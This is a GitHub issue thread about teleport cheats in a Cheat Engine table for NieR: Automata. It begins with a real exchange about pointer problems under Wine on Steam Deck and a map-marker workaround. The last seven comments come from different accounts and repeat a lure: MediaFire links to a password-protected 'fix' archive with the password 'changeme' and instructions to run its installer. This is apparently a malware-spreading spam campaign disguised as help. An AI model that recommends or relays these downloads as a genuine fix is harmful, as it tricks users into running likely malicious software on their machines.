### ISSUE TITLE
[Question] Would you happen to remember anything dealing with teleporting?

### ISSUE THREAD

**Issue by TFWol** [aloyark/NieR-Automata-Practice-Table#1]
I realized I hate all the running around if it's in the same locations over and over again, but then I saw your neat project. Unfortunately the teleports don't work. 
Just curious if you remember any details about it, so I thought I'd ask.

**Comment by aloyark** [comment]
Huh that's strange, what version of the game are you playing on? It should be working for the latest version of steam (1.02)

**Comment by TFWol** [comment]
Using it on Steam Deck.
The problem might be bc of the hardcoded pointers since I get ??? where there should be values.

I haven't noticed issues with aobscan found stuff like inf jumping.

**Comment by TFWol** [comment]
Yep, it's something to do with Pointers and Wine emulation, blah, blah. I decided to go [this route](https://forum.cheatengine.org/viewtopic.php?p=5784911&sid=a4850c9e55ab8d18967525c0a54322ec).
Sorry for bothering you for an unusual platform setup.

**Comment by TFWol** [comment]
Forgot to mention. The game's custom map marker corresponds to the exact same coordinates outside the map. If you make those overwrite your current position, you can go anywhere you place the marker 😃

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
